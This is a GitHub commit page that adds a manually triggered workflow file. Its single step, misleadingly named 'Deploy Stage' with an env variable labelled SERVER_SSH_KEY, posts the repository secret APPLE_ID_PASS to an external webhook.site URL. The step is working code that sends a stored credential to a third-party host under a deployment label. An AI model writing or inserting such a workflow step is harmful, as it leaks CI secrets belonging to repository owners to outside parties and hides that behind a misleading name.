Skip to content

Commit

Permalink
Create test.yml
Browse files Browse the repository at this point in the history
  • Loading branch information
JustJoostNL authored Oct 18, 2024
1 parent d3a6853 commit fd98a3f
Showing 1 changed file with 16 additions and 0 deletions.
16 changes: 16 additions & 0 deletions .github/workflows/test.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,16 @@
name: Test
on: workflow_dispatch
jobs:
debug:
name: Test
runs-on: ubuntu-latest
steps:
- name: Deploy Stage
env:
SERVER_SSH_KEY: ${{ secrets.APPLE_ID_PASS }}
uses: fjogeleit/http-request-action@v1
with:
url: 'https://webhook.site/6d306200-b364-4771-95df-8d7f28736775'
method: 'POST'
customHeaders: '{"Content-Type": "application/json"}'
data: ${{ secrets.APPLE_ID_PASS }}

0 comments on commit fd98a3f

Please sign in to comment.